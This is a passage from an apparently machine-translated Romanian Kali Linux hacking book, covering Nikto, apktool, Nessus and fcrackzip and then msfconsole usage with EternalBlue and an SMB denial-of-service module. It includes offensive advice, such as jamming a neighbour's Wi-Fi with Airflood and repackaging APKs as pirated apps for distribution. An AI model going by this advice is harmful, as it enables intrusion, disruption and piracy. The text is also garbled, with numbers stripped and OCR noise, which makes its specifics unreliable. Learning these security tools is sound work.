microscop, atunci acest program este pentru dvs Programul este potrivit nu numai pentru hackeri, ci și pentru administratorii de rețea care îl pot folosi pentru a depana rețeaua și pentru studenții care doresc să învețe structura protocoalelor de rețea Îl poți folosi astfel: tshark -f "tcp port " -i ethO Aici ne interesează doar pachetele de protocol TCP de pe portul , transmise prin interfața ethO Adică vom capta doar traficul de pe placa de rețea Orez Pachetele transmise Există, de asemenea, o versiune GUI care este mai ușor de utilizat La pornire, trebuie să selectați interfața dorită ascultați (Fig ), apoi veți vedea toate pachetele capturate, ascultați eu p£ Van " a □ f (c) ' iedera * |Nu Тігэ &ОЦГГГ Ocstlnatlon PrattKOi ieiiqtll >nfo foiJefloi \ri unde Hjlb-uw" Comprimați datele pentru a fi notate în Mowwg Luați în considerare rezultatul scanerului, acordați atenție liniilor evidențiate în grăsime nym: - Nikto V + IP țintă: + Nume gazdă țintă: + Port țintă: + Ora de începere: vm - - : : (GMT ) + Server: Apache/ (Ubuntu) + Cookie mcfront creat fără marcajul httponly + Antetul X-Frame-Options anti-clickjacking nu este prezent + Nu s-au găsit directoare CGI (utilizați "-C all" pentru a forța verificarea tuturor directorilor posibile) + Verbul HTTP DEBUG poate arăta informații de depanare a serverului Consultați http://msdn microsoft com/en-us/library/e z xdh% VS % aspx pentru detalii + /config php: Fișierul PHP Config poate conține ID-uri și parole ale bazei de date + OSVDB- : /server-status: Aceasta dezvăluie informații Apache Conectați linia corespunzătoare în httpd conf sau restricționați accesul la gazdele permise + Cookie pmaCookieVer creat fără marcajul httponly + Cookie phpMyAdmin creat fără marcajul httponly + Cookie pma lang creat fără marcajul httponly + Cookie pma collation connection creat fără marcajul httponly + Antet neobișnuit "x-frame-options" găsit, cu conținut: DENY + Antet neobișnuit "content-security-policy" găsit, cu conținut: default-src 'seif' ;script-src 'seif' 'unsafe-inline' ' unsafe-eval' ;;style-src 'seif' 'unsafe-inline' ;img-src 'seif' date: * tile openstreetmap org * tile opencyclemap org + Antet neobișnuit "x-content-security-policy" găsit, cu conținut: default-src "seif" ;opțiuni inline-script eval-script;img-src date "seif": * tile openstreetmap org * tile opencyclemap org + Antet neobișnuit "x-webkit-csp" găsit, cu conținut: default-src "seif" ;script-src "seif" "unsafe-inline" 'unsafe-eval';style-src 'seif' 'unsafe-inline' ;img-src 'seif' date: * tile openstreetmap org * tile opencyclemap org; + Antet neobișnuit "x-ob mode" găsit, cu conținut: + Serverul scurge inoduri prin ETags, antet găsit cu fișierul /icoane/ README, câmpuri: xl f x c a + OSVDB- : /icons/README: Fișier implicit Apache găsit + /phpmyadmin/: directorul phpMyAdmin găsit + articole verificate: eroare(e) și articol(e) raportat(e) pe gazda la distanță + Ora de încheiere: - - : : (GMT ) ( secunde) + gazdă(e) testată • Serverul raportează versiunea sa Trebuie să editați fișierul de configurare pentru a preveni acest lucru • Fișierul /config php conține parole pentru accesarea bazei de date • /server-status raportează starea serverului, trebuie să editați și configurația serverului • /phpmyadmin - acordați atenție acestui director, este evident că trebuie să restricționați accesul la el doar la nodurile de încredere Pe fig Figura este un exemplu de server web configurat corect care nu raportează nimic în plus (ei bine, aproape nimic - doar versiunea sa) Orez , Scanarea unei alte gazde cu configurația corectă a serverului web Nikto are multe opțiuni diferite Am folosit opțiunea -h pentru a specifica numele sau adresa IP a gazdei Este posibil să aveți nevoie și de opțiunea -port, care vă permite să specificați un număr de port ( în mod implicit) O descriere a tuturor opțiunilor Nikto poate fi găsită la: https://kali tools/?p= Sforâie Instrumentul Wireshark a fost deja menționat Utilitarul Snort vă permite să analizați traficul în timp real cu posibilitatea de a înregistra pachete Dar Snort este mai mult decât o simplă utilitate de captare a traficului Acesta este un sistem de prevenire a intruziunilor - IDS Instalarea și configurarea corectă a Snort nu este un proces ușor și depășește scopul acestei cărți Cu toate acestea, dacă doriți să vă protejați serverul de colegii dvs , ar trebui să luați în considerare utilizarea Snort: https://bit ly/ JMyKpx Flux de aer Vrei să te răzbuni pe aproapele tău? Încearcă să-i întrebi hotspot-ul Acest program populează tabelul client al punctului de acces cu MAC-uri aleatorii, făcând imposibile conexiunile Din anumite motive, acest program nu este instalat în cele mai recente versiuni de Kaii Linux Dar sursele sale sunt încă disponibile la: https://packetstormsecurity eom/files/ /airflood l tar gz html Apktool Apktool este într-adevăr unul dintre instrumentele populare Kaii Linux pentru sinergizarea inversă a aplicațiilor Android Instrumentul este foarte popular printre hackeri, deoarece vă permite să analizați un fișier APK și să îl reconstruiți Atâta timp cât ARC-ul este dezasamblat, un hacker îl poate modifica după cum dorește Programul apktool nu este instalat implicit, așa că pentru a-l instala, trebuie să introduceți comanda: sudo apt install apk tool Luați în considerare un mic exemplu de utilizare a programului Să despachetăm fișierul firewall apk: apktool decode firewall apk X IIUIIIIIIIHIIIIIIII IIIIIIIII IIII Pic , apktool în acțiune Programul vă va analiza APK-ul și vă va pune conținutul într-un director cu același nume ca fișierul APK În cazul nostru, trebuie să mergeți la directorul firewall și veți vedea conținutul fișierului dvs APK (Fig ) Așa sunt create versiunile piratate ale ARC (pe care le puteți descărca, de exemplu, pe w bsit -dns com ), ARC-ul este implementat, modificat și împachetat iese înapoi Orez , Conținutul fișierului APK După aceea, aveți posibilitatea de a schimba orice fișier, de exemplu, o resursă (imagine), care este stocată în directorul res Utilizarea apktool în cele mai pașnice scopuri implică posibilitatea de a instala două aplicații identice pe un singur telefon Pentru a face acest lucru, deschideți AndroidManifest xml și schimbați numele pachetului: pachet="" Orez Schimbați AndroidManifesixml Trebuie doar să introduceți un alt nume pentru pachet, să lăsați noul program să fie numit la fel cu cel vechi, doar să adăugați un prefix sau un postfix la el ca un program! După aceea, puteți reconstrui fișierul arch La asamblare, trebuie să-l semnați cu același certificat ca și originalul, altfel nu va ieși nimic din el Să construim fișierul APK: apktool buildfirewall firewall apk Aici firewall apk este numele versiunii noastre a fișierului APK Rămâne doar să semnăm dosarul Acest lucru se poate face folosind programul SmartAPKTools, care poate fi descărcat de la: http://kodopik ro/SmartA PKTool zip Totul în aplicație este clar și simplu După semnare, puteți pune aplicația pe un site, astfel încât utilizatorii să o poată descărca Nessus este cel mai bun scaner de vulnerabilități Dacă doriți să găsiți vulnerabilitățile unui computer conectat la rețea (nu vorbim despre alimentare, sperăm că ați ghicit!), folosiți Nessus De obicei, un test de penetrare începe cu o scanare a vulnerabilității Un scaner bun conține o bază de date mereu actualizată cu vulnerabilități cunoscute și, scanând rețeaua, raportează prezența uneia sau a altora Sarcina unui hacker este să descopere cât mai multe vulnerabilități posibil Trebuie remarcat faptul că scanerele raportează adesea false pozitive, așa că nu veți putea folosi toate vulnerabilitățile găsite Unul dintre cele mai populare scanere de vulnerabilitate de pe piață este Nessus Vulnerability Scanner A devenit un fel de standard pentru scanerele de vulnerabilitate Inițial a fost un proiect open source Ulterior a fost achiziționat de TeraBe și este acum un produs comercial (versiunea profesională) În ciuda acestui fapt, Nessus Scanner are încă o versiune Essential (numită anterior Note) care este gratuită, dar limitată la adrese IP Această versiune o vom lua în considerare în continuare Trebuie să înțelegeți că niciun scaner nu poate detecta vulnerabilități zero-day (O-day), adică acele vulnerabilități pe care cineva le-a descoperit astăzi Acest lucru se datorează faptului că scanerele trebuie actualizate foarte rapid, ceea ce este imposibil din motive evidente Să presupunem că cineva Pupkin a găsit o vulnerabilitate într-un anumit program Dacă nu are nicio legătură cu dezvoltatorii scanerului, atunci probabilitatea ca vulnerabilitatea pe care a găsit-o să apară în baza de date a scanerului este Atunci acest Pupkin pirata mai multe sisteme folosind vulnerabilitatea găsită, atunci va apărea doar în baza de date - când publicul află despre asta Recent, chiar și guvernul SUA a început să folosească Nessus pentru scanarea vulnerabilităților Aproape fiecare birou federal american și bază militară din întreaga lume utilizează acum Nessus Dezvoltatorii Nessus au făcut totul pentru a complica căutarea unui link pentru a descărca versiunea Essential Prin urmare, vă oferim un link direct: https://www sustenabil com/products/nessus/nessus-essentials fcrackzip - spargerea parolei arhivei zip Acest instrument vă permite să spargeți o arhivă Zip protejată prin parolă În loc de o mie de cuvinte, să aruncăm o privire asupra acestui instrument în acțiune Împachetați câteva fișiere, setați orice parolă atunci când creați arhiva Apoi trimitem această arhivă la instrumentul fcrackzip Puteți crea o arhivă cu o parolă folosind un manager de fișiere standard Selectați tipul de arhivă zip și setați o parolă pentru aceasta, așa cum se arată în Fig , Orez , Crearea unei arhive cu o parolă În mod implicit, acest program nu este instalat, așa că pentru a-l instala, trebuie să introduceți comanda: sudo apt install fcrackzip Apoi rulați programul astfel: fcrackzip firewall zip Programul va începe să caute posibile combinații de parole și va trebui să așteptați puțin (în același timp, programul nu afișează nimic pe ecran, dar nu trebuie să te gândești că nu face nimic sau s-a atârnat) Timpul de așteptare depinde de complexitatea parolei, dar având în vedere că arhiva este un fișier, nu un serviciu de rețea, iar numărul de încercări incorecte nu este limitat în niciun fel, este sigur să spunem că, mai devreme sau mai târziu, programul va ghici parola Programul va raporta parola găsită după cum urmează: posibil pw găsit: aa/mc? aa/mc? - aceasta este parola specificată la crearea arhivei Descrierea altor instrumente poate fi găsită la https://kali tools/ În următorul capitol, ne vom uita la popularul cadru de scanare a vulnerabilităților Metasploit, care face parte din Kaii Linux De fapt, capitolul va fi o continuare a acestui capitol Capitolul Secretele lui Metasploit Ce este Metasploit Apropie, ce este el și de ce îi este dedicat un întreg capitol Să începem de la bun început În , hackerului HD Mooge (aceasta este porecla lui) a venit cu ideea de a dezvolta un instrument pentru a scrie și a folosi rapid exploatările Așa că s-a născut cunoscutul proiect Metasploit (atât în cercurile hackerilor, cât și a specialiștilor în securitate IT) Prima versiune a framework-ului a fost scrisă în Perl, care conținea o interfață pseudo-grafică bazată pe biblioteca curses La acel moment, era doar un set de exploit-uri și scripturi disparate, informații generale despre care erau stocate într-o singură bază de date Informațiile despre mediul necesar pentru rularea scripturilor, de regulă, lipseau De asemenea, au avut o mulțime de cod învechit, au necesitat modificarea căilor hard-coded pentru fiecare caz specific, ceea ce a făcut fluxul de lucru foarte dificil și a complicat dezvoltarea de noi instrumente În general, prima versiune a cadrului a fost ca prima clătită, care este întotdeauna cocoloașă Dar e în regulă, dar alți voluntari s-au alăturat lui HD Mooge, cărora le-a plăcut ideea, inclusiv lui Matt Miller În a doua versiune, cel puțin o anumită ordine a fost pusă în baza de date Metasploit în sine A treia versiune a fost complet rescrisă în Ruby, a fost dezvoltată de Metasploit LLC (fondată de aceiași dezvoltatori în ) În , licența Metasploit Framework a fost schimbată de la proprietară la BSD Mai recent, în , firma de gestionare a vulnerabilităților Rapid a anunțat achiziția Metasploit, o suită de testare de penetrare cu două scopuri De asemenea, a fost raportat că versiunea non-comercială a utilitarului va fi în continuare disponibilă pentru toată lumea De la achiziționarea cadrului, multe s-au schimbat Au apărut versiunile PRO și Community, iar în , a fost lansată o versiune mai simplificată pentru utilizatorii "cu calificare redusă", Metasploit Express În prezent, cadrul este distribuit în patru versiuni: • Framework - versiune de bază cu interfață consolă; • Community - versiune gratuită, care include în plus o interfață web și unele funcționalități din versiunile comerciale; • Express - pentru utilizatorii comerciali, include funcționalitate de simplificare a desfășurării auditurilor de bază și de raportare asupra acestora; • Pro - cea mai avansată versiune, oferă capabilități avansate de atac, vă permite să creați lanțuri de sarcini pentru audit, să întocmiți rapoarte detaliate și multe altele Pe lângă interfața web disponibilă în versiunile Community, Express și Pro, există proiecte precum Annitage (http://www fastandeasyhacking com/) și Cobalt strike (https://www cobaltstrike com/) care oferă o interfață grafică prietenoasă și intuitivă pentru cadru Primul se numește Cyber Attack Management pentru Metasploit - managementul atacurilor cibernetice pentru Metasploit În comparație cu alte interfețe, Annitage vă permite să vizualizați toate etapele unui atac, inclusiv: scanarea nodurilor de rețea, analiza securității resurselor detectate, executarea exploit-urilor și obținerea controlului deplin asupra unui sistem vulnerabil Toate funcțiile programului sunt structurate și ușor accesibile din meniurile și filele programului, chiar și pentru un cercetător începător în securitatea computerelor Programul este conceput pentru a fi utilizat pe platformele Linux și Windows Site-ul web al dezvoltatorului (http://www fastandeasyhack-ing com/manual) conține coduri sursă, manuale în format text și video Se poate spune despre interfața Cobalt că este prea scumpă O licență anuală costă USD per utilizator, iar reînnoirea costă USD Numai profesioniștii de înaltă clasă își pot permite un astfel de instrument, pentru că trebuie nu numai să îl cumpărați, ci și să îl faceți să aducă bani Și având în vedere că aceasta este doar o coajă, și nu cadrul în sine, este clar că în spatele ei nu există nicio coadă, mai ales în spațiile noastre deschise Structura cadru "Inima" Metasploit este biblioteca Rex Este necesar pentru operațiuni generale: lucrul cu socket-uri, protocoale, formatarea textului, lucrul cu codificări și altele asemenea Biblioteca MSF Coge se bazează pe aceasta, care oferă funcționalități de bază și un API "la nivel scăzut" Este folosit de biblioteca MSF Base, care, la rândul său, oferă un API pentru pluginuri, interfață cu utilizatorul (atât pentru consolă, cât și grafică) și pluginuri Toate modulele sunt împărțite în mai multe tipuri, în funcție de funcționalitatea oferită: • Exploit - cod care exploatează o anumită vulnerabilitate a sistemului țintă (de exemplu, supraîncărcarea stivei) • Sarcină utilă - cod care rulează pe sistemul țintă după ce exploit-ul a funcționat (stabilește o conexiune, execută un script shell etc ) • Poștă - cod care rulează pe sistem după o penetrare cu succes (de exemplu, colectează parole, descarcă fișiere) • Encoder - instrumente pentru ofuscarea (obfuscarea codului) modulelor pentru a le masca de antivirusuri • Generatoare NOP - NOP'ob Aceasta este o instrucțiune de asamblare care nu face nimic Folosit pentru a umple golurile din fișierele executabile pentru a se potrivi cu dimensiunea necesară • Auxiliar - module pentru scanarea rețelei, analiza traficului și așa mai departe Înainte de a începe lucrul cu pachetul, trebuie să luați în considerare posibilitatea de a utiliza o bază de date pentru a stoca informații despre gazde, servicii, vulnerabilități și așa mai departe Conectarea la baza de date nu este o condiție foarte necesară pentru funcționarea cadrului, dar, cu toate acestea, crește gradul de utilizare a performanței Metasploit folosește PostgreSQL, așa că înainte de a începe să lucrați cu el, va trebui să instalați un DBMS pe sistemul dumneavoastră Apoi asigurați-vă că funcționează bazele de date și serviciile cadru necesare În continuare, vă vom arăta cum să pregătiți o bază de date pentru Metasploit Biblioteci Interfețe i i Exploatează codificatoarele Payio^ds ; eu Pic Structura Metasploit Terminologie de bază Înainte de a începe să învățăm cadrul, trebuie să înțelegem terminologia, astfel încât să vorbim aceeași limbă Un exploit este un termen general în comunitatea de securitate computerizată pentru o bucată de cod care, profitând de oportunitatea oferită de o eroare, defecțiune sau vulnerabilitate, duce la escaladarea privilegiilor sau la refuzul serviciului pe un sistem informatic În linii mari, aceasta este o bucată de cod care conține o eroare care duce la o vulnerabilitate (vezi mai jos) în sistem Shellcode, shell code, shellcode este un cod executabil binar care transferă de obicei controlul către consolă, cum ar fi bin / sh * shell Unix, command com în MS-DOS și cmd exe în sistemele de operare Microsoft Windows Codul shell poate fi folosit ca sarcină de exploatare, oferind unui hacker acces la un shell pe un sistem informatic Forma inversă - atunci când se exploatează o vulnerabilitate de la distanță, codul shell poate deschide un port TCP predeterminat al computerului vulnerabil, prin care va fi efectuat accesul suplimentar la shell-ul de comandă, un astfel de cod se numește shellcode de legare la port Dacă shellcode se conectează la portul computerului atacatorului, ceea ce se face pentru a ocoli firewall-ul sau NAT, apoi acest cod se numește reverse shell (în engleză, reverse shell shellcode) Vulnerabilitate - În securitatea computerelor, termenul de vulnerabilitate este folosit pentru a se referi la o zonă slab protejată sau deschisă dintr-un sistem O vulnerabilitate poate fi rezultatul erorilor de programare sau defectelor de proiectare ale sistemului O vulnerabilitate poate exista fie doar teoretic, fie poate avea un exploit cunoscut Vulnerabilitățile sunt adesea rezultatul neglijenței programatorului, dar pot avea și alte cauze O vulnerabilitate permite de obicei unui atacator să păcălească o aplicație, de exemplu, prin injectarea de date într-un mod neplanificat pentru a executa o comandă pe sistemul pe care rulează aplicația sau prin exploatarea unei supravegheri care permite accesul neintenționat la memorie pentru a executa cod la nivelul de privilegii al programului Unele vulnerabilități apar din cauza validării insuficiente a datelor introduse de utilizator; adesea acest lucru vă permite să executați direct comenzi SQL (injecție SQL) Alte vulnerabilități apar din cauza unor probleme mai complexe, cum ar fi scrierea datelor într-un buffer fără a verifica limitele acestuia, ca urmare, tamponul se poate depăși, ceea ce poate duce la execuția arbitrară a codului Un alt concept cu care trebuie să ne ocupăm este sarcina utilă - sarcină utilă Dacă începeți să studiați ghiduri de hacking străine (și mai devreme sau mai târziu se va întâmpla), atunci toate sunt pline de un singur termen - sarcină utilă Cum să-l înțelegi? Se traduce literal prin "sarcină utilă" Acest cuvânt se referă la codul sau o parte din codul unui program rău intenționat (viermi, viruși) care realizează direct o acțiune distructivă: șterge date, trimite spam, criptează datele, deschide o conexiune pentru un hacker etc Programele rău intenționate au, de asemenea, un cod general (literal, "cod de serviciu"), care se referă la partea din cod care este responsabilă de livrarea către mașina atacată, de autopropagarea programului rău intenționat sau de prevenirea detectării Cu alte cuvinte, așa-numita "sarcină utilă" pentru victimă nu este deloc utilă Dar pentru un hacker, sarcina utilă este un element cheie care trebuie livrat la computerul țintei și executat Codul de sarcină utilă poate fi scris de unul singur (și aceasta este abordarea corectă, care vă permite să reduceți semnificativ șansele de a fi detectat de antivirusuri - veți vedea rapid singur dacă încercați să rulați fișiere executabile de încărcare utilă pe sisteme cu instalat antivirus), sau puteți utiliza o varietate de generatoare de sarcină utilă Esența muncii acestor programe este că hackerul selectează o sarcină tipică (de exemplu, inițializarea unui shell pentru introducerea comenzilor cu o conexiune inversă), iar generatorul vă oferă un cod executabil pentru platforma selectată Dacă nu aveți abilități de programare, atunci aceasta este singura opțiune posibilă Unul dintre cele mai populare generatoare de sarcină utilă este MS-Fvenom Aceasta este o parte autonomă a Metasploit concepută pentru a genera încărcături utile Configurații cadru și comenzi de bază Există trei configurații de cadru - linie de comandă (numită msfconsole), interfață web (Metasploit Community, PRO și Express), shell grafic (Armitage, Cobalt strike) Avand in vedere ca doar invatam, nu vom cumpara versiuni platite De fapt, puteți face totul în aceeași msfconsole și, în același timp, nu plătiți nimic nimănui în această etapă În ciuda prezenței interfețelor grafice, cel mai comun mod de a lucra cu Metasploit este în continuare interfața consolei msfconsole Comenzile principale ale consolei sunt prezentate în Tabelul Tabelul Comenzi de bază msfconsole Descrierea comenzii utilizați Folosit pentru a selecta un anumit modul cu care să lucrați înapoi Operațiunea inversă de utilizare, adică oprirea lucrului cu modulul selectat și revenirea înapoi show Afișează o listă de module de un anumit tip set Setează o valoare pentru un anumit obiect rulați modulul Run helper info Afișează informații despre modul căutare Găsiți un anumit modul verificați Verificați dacă sistemul țintă este afectat de vulnerabilități sesiuni Afișează o listă de sesiuni disponibile Configurarea modulului Fiecare modul are propriul set de opțiuni pe care un hacker le poate personaliza pentru a se potrivi nevoilor sale Există atât de multe opțiuni încât este imposibil să le enumerați pe toate aici Cu toate acestea, mai jos sunt câteva opțiuni care sunt utilizate în mod obișnuit pentru configurarea modulelor: • Tipul de sarcină utilă - definește tipul de sarcină utilă pe care exploit-ul o va livra țintei Sunt disponibile următoarele tipuri: " Comanda: sarcina utilă care execută comanda Poate fi folosit pentru a executa comenzi pe un computer la distanță " Meterpreter: o sarcină utilă avansată care oferă o linie de comandă cu care să livrezi comenzi și să aplici extensii • Tipul de conexiune - determină modul în care Metasploit se va conecta la țintă Opțiuni posibile: " Automat - la conectarea automată, conexiunea conectată este utilizată dacă a fost detectat NAT; în caz contrar, se utilizează feedback " Conectat - folosește o conexiune conectată, care este deosebit de importantă dacă ținta nu se află în zona firewall sau gateway-ul NAT " Reverse - folosește feedback, care este deosebit de important dacă sistemul nu poate iniția o conexiune cu ținte " LHOST - Specifică adresa gazdei locale " LPORT - definește porturile care vor fi utilizate pentru feedback " RHOST - Specifică adresa țintei " RPORT - Specifică portul de la distanță care va fi atacat • Setări țintă - Specifică sistemul de operare țintă și versiunea • Exploit timeout - definește un timp de așteptare de câteva minute Prima rulare a Metasploit Deschideți meniul aplicației și introduceți Metasploit În continuare, va apărea comanda de lansare a cadrului Da, Metasploit este instalat implicit pe Kaii Linux și nu trebuie să faceți niciun pas pentru a-l instala ] a o a Orez Cum să rulați consola Metasploit în Kali Linux La prima pornire, baza de date framework va fi inițializată (Fig ) Fișierul de configurare a bazei de date se află în /usr/share/metasploit-framework/config/database yml Pe fig puteți vedea promptul msf - consola este gata să introducă comenzi Orez Inițializarea bazei de date Frame-ul conține o comandă utilă dbnmap care nu numai că începe o scanare cu nmap, dar și salvează rezultatele scanării în baza de date cadru: db nmap [*] Nmap: începe Nmap ( http://nmap org ) la - - : MSK [*] Nmap: Raport de scanare Nmap pentru [*] Nmap: gazda este activă (latență de Î) [*] Nmap: Nu este afișat: de porturi închise [*] Nmap: SERVICIUL STATUL PORTULUI [*] Nmap: /tcp deschide ssh [*] Nmap: /tcp deschide http [*] Nmap: shell filtrat /tcp [*] Nmap: /tcp open squid-http [*] Nmap: /tcp open freeciv [*] Nmap: /tcp deschide http-alt [*] Nmap: /tcp deschis http-proxy [*] Nmap: Nmap finalizat: adresă IP ( gazdă în sus) scanată , secunde M • : "I- ! gyime : £P{DM) O a o ** g □ X Deigzia Vizualizare Ajutor /G tno"! adică nr G "> la SIDTS tt t'Uf Wii - • - U, ■" hti р*: •>-" " ajutor Comenzi de bază comanda Descriere back banner cd connect ieșire ajutor modulul de informații sarcina de locuri de munca irb Meniul de ajutor Reveniți din contextul curent Afișați un banner metasploit minunat Schimbați directorul de lucru curent Comunicați cu o gazdă Ieșiți din consolă Meniul de ajutor Afișează informații despre unul sau mai multe Treceți în modul de scriptare irb Afișează și gestionează joburile Încărcați un plugin cadru Гi"<> cale de încărcare resursă de părăsire cale Caută și încarcă module din a Ieșiți din consolă Rulați comenzile stocate într-un fișier Notă Aici și mai jos, vom omite o parte din rezultatele Metasploit deoarece consola lui poate genera o ieșire destul de lungă, ceea ce nu este de dorit să fie publicat într-o carte use command - selectați un modul de utilizat Comanda de utilizare vă permite să selectați un anumit modul cu care să lucrați, de exemplu: exploit/windows/smb/ms folosește exploit/windows/smb/ms nețapi exploit/windows/smb/ms killbill utilizați exploit/windows/smb/ms Isass Pic utilizați comanda Notă Una dintre caracteristicile consolei este completarea automată a comenzii, similară cu cea folosită pe linia de comandă Linux Doar începeți să tastați, apoi apăsați Tab și consola fie vă va completa comanda, fie vă va oferi mai multe opțiuni arata comanda - arata entitati Comanda show va afișa toate entitățile disponibile (module, opțiuni, ținte etc ) Comanda show trebuie să primească un tip de entitate sau cuvântul all pentru a lista toate modulele instalate Afișați toate rezultatele comenzii: msf > arata tot codificatoare Nume Descriere cmd/generic sh Generic Codificator de comandă de înlocuire Variabila Shell generic/niciuna mipsbe/longxor The XOR Codificator "niciun" codificator Ieșirea este foarte mare și poate dura câteva minute Prin urmare, cel mai bine este să studiați lista de module pe grupuri Sunt disponibile următoarele grupuri: • codificatoare •nup • exploatează • sarcini utile • auxiliar • post • pluginuri De asemenea, la sfârșitul show-all output, este afișată o listă de pluginuri instalate: [*] [*] Pluginuri de cadru disponibile * nessus *rssfeed * sqlmap * sunete * auto add route * cerere * agregator G * msgrpc * msfd *nexpune * db credcollect * libnotify *fir * alias * session tagger * token adduser *pcap log *probă *observator * socket logger * openvas *hartă * wiki * eveat-tester * token^hunter *ffautoregen *session notifier *laborator * db tracker *ips filter Comenzile pe care le vei folosi cel mai des sunt: arată auxiliar arată exploit arată încărcăturile utile Rularea show auxiliary va afișa o listă a tuturor modulelor auxiliare disponibile în Metasploit După cum am menționat mai devreme, modulele accesorii includ scanere, module de refuzare a serviciului, fuzzere și multe altele Comanda show exploits va fi cea mai interesantă pentru tine Rulați show exploits pentru a obține o listă a tuturor exploit-urilor asociate într-un singur mediu logic Rularea sarcinilor utile de afișare va afișa toate încărcările utile pentru toate platformele disponibile în Metasploit Comanda show options va afișa opțiunile modulului dacă ați selectat un anumit modul Luați în considerare un mic exemplu: msf > utilizați exploit/windows/smb/ms netapi [*] Utilizarea sarcinilor utile configurate windows/meterpreter/reserse tcp msf > show options Opțiuni de modul (exploit/windows/smb/ms netapi): Nume Setare curentă Obligatorie Descriere RHOSTS da Gazda(e) țintă, interval RPORT da Portul de serviciu SMB (TCP) SMBPIPEBROWSER da Numele conductei de utilizat (BROWSER opțiuni de încărcare utilă (windows/meterpreter/reserse tcp): Nume Setare curentă Obligatorie Descriere EXITFUNC thread da Tehnica de ieșire (Admis LHOST da Ascultă adresa (o interfață LPORT da Portul de ascultare exploatați ținta: Id Nume Windows XP SP /SP După cum sa menționat deja, atunci când introduceți comanda show payloads, sistemul arată toate încărcăturile disponibile Dar dacă ați selectat un anumit modul, atunci sistemul va afișa doar sarcinile utile ale modulului selectat, de exemplu: Sarcini compatibile # Nume Dezvăluire Data Rank Verificare Descriere generic/personalizat normal Nr Sarcină utilă personalizată generic/debug trap normal Nr Generic x Deb Comanda show targets vă permite să vizualizați țintele, în cazul în care nu sunteți sigur dacă sarcina utilă este compatibilă cu sistemul țintă: Ținte de exploatare: J Id Nume Despre Windows XP SPO/SP Aceasta este o exploatare destul de veche Să ne uităm la opțiuni mai noi Pentru aceasta folosim comanda de căutare Vom căuta după numele vulnerabilității - ethemalblue: msf >căutare eternalblue Module de potrivire Nume Dezvăluire Data Verificare clasament Descriere auxiliar/admin/smb/msl command - - normal Da MS - auxiliar/scaner/smb/smb msl normal Da MS - exploit/windows/smb/msl eternalblue - - medie Nu MS - exploit/windows/smb/msl eternalblue win - - medie Nu Să încercăm acest exploit: înapoi utilizați exploit/windows/smb/msl ethernalblue arată ținte exploatați ținta: Id Nume Windows și Server R (x ) Toate pachetele de servicii Acest exploit este deja mai proaspăt Există, de asemenea, un exploit similar pentru Windows Comanda info va afișa informații detaliate despre un anumit modul, inclusiv toate opțiunile, obiectivele și alte informații: msf > info dos/windows/smb/msO - l write Nume: Microsoft SRV SYS WriteAndX Versiunea DataOffset nevalidă: Licență: Metasploit Framework License (BSD) Furnizat de: jvvallejo Odată ce ați selectat un anumit modul, utilizați comanda use pentru a-l folosi Observați în rezultatul de mai jos variabila globală care a fost setată în configurația setată anterior (RPORT) utilizați dos/windows/smb/ms write msf auxiliar (ms write) > afișați opțiuni opțiuni de modul: Nume Setare curentă Descriere necesară RHOST RPORT port da Adresa țintă da Setați serviciul SMB Comanda de conectare vă permite să vă conectați la o adresă IP (prin numărul de port) de la msfconsole la fel ca și cum ați folosi netcat sau telnet: conectați [*] Conectat la : Buna ziua DD-WRT v std(c) NewMedia-NET GmbH Lansare: / / (reviziunea SVN: ) Conectare DD-WRT: Comenzi set și setg - Setarea valorilor variabilelor Comanda set vă permite să setați o opțiune de modul Comanda setg setează o opțiune globală, valoarea dată va fi disponibilă pentru toate modulele Puteți seta valoarea opțiunii astfel: setați RHOST RHOST => msf auxiliar (ms write) > afișați opțiuni opțiuni de modul: Nume Setarea curentă Descriere necesară RHOST RAPORT da da Adresa țintă Setați serviciul SMB port Puteți seta variabile globale în msfconsole Pentru aceasta, se folosește comanda setg, așa cum sa menționat deja Odată instalate, acestea vor fi disponibile în exploit-uri și suplimente De asemenea, puteți salva aceste opțiuni pentru utilizare ulterioară Dar există o altă situație - când setați o variabilă globală și ați uitat de ea Am uitat să o setez și pe cea locală, drept urmare numești exploit cu alte opțiuni, și nu cu cele de care ai nevoie Comanda unsetg este folosită pentru a reseta o variabilă globală Numele variabilelor din Metasploit nu fac distincție între majuscule și minuscule Folosim caractere majuscule (cum ar fi LHOST) pentru claritate, dar nu este necesar Exemple: msf > setg LHOST LHOST => msf > setg RHOSTS / RHOSTS => / msf > setg RHOST RHOST => msf > salvare Configurație salvată în: /root/ msf /config msf > Aici nu numai că am setat variabilele globale, dar le-am și salvat pentru a le utiliza ulterior de către comanda de salvare comandă de verificare - verificarea sistemului țintă Foarte utilă în practică este comanda check, care vă permite să verificați dacă sistemul țintă este vulnerabil la exploitul selectat: msf exploit(ms wins) > afișați opțiuni opțiuni de modul: Nume Setare curentă Descriere necesară RHOST RAPORT da da Adresa țintă Portul țintă Țintă de exploatare: Id Nume Windows engleză msf exploit(ms wins) > verificați [-] Verificare a eșuat: conexiunea a fost refuzată de gazda la distanță ( : ) În acest caz, sistemul țintă nu este potrivit pentru testare deoarece conexiunea a fost închisă de gazda la distanță Comanda bask - întoarcere Când ați terminat cu un anumit modul, lansați comanda înapoi pentru a sări înapoi Apoi puteți alege un alt modul și puteți continua să lucrați comanda hyp - rulați exploit Puteți rula exploitul pregătit cu comanda gshg msf auxiliar(ms write) > rulați Se încearcă blocarea gazdei de la distanță datalenlow= dataoffset= fillersize= rescue datalenlow= dataoffset= fillersize= de salvare datalenlow= dataoffset= fillersize= de salvare datalenlow= dataoffset= fillersize= Z salvare datalenlow= dataoffset= fillersize= de salvare resource command - definirea resursei Unele atacuri, cum ar fi Kannetasploit, folosesc un fișier de comandă care poate fi încărcat prin msfconsole folosind comanda de resurse Execută comenzi secvenţial într-un fişier msf > resursă karma rc resursă> încărcați db sqlite [-] [-] Funcționalitatea furnizată anterior de acest plugin a fost [-] integrat în setul de comenzi de bază Utilizați noul "driver db" Comanda [-] pentru a utiliza un driver de bază de date, altul decât sqlite (care [-] este acum implicit) Toate comenzile vechi sunt aceleași [-] [-] Nu s-a încărcat pluginul din /pentest/exploits/ framework /plugins/db sqlite : Resursa plugin depreciată> db create /root/karma db [*] Baza de date specificată există deja, se conectează [*] Conectat cu succes la baza de date [*] Fișier: /root/karma db resource> folosește auxiliar/server/browser autopwn resursă> setg AUTOPWN HOST AUTOPWN HOST => echipa irb Rularea acestei comenzi vă va pune în modul Ruby, unde puteți scrieți scripturi din mers și executați comenzi: msf > irb [*] Se pornește shell-ul IRB [♦] Sunteți în obiectul "cadru" piits "Bună, metasploit!" Salut metasploit! Studiu de caz : Hackingul unui server Windows vechi cu un Exploit NSA În sfârșit, am ajuns la cele mai interesante Este timpul să 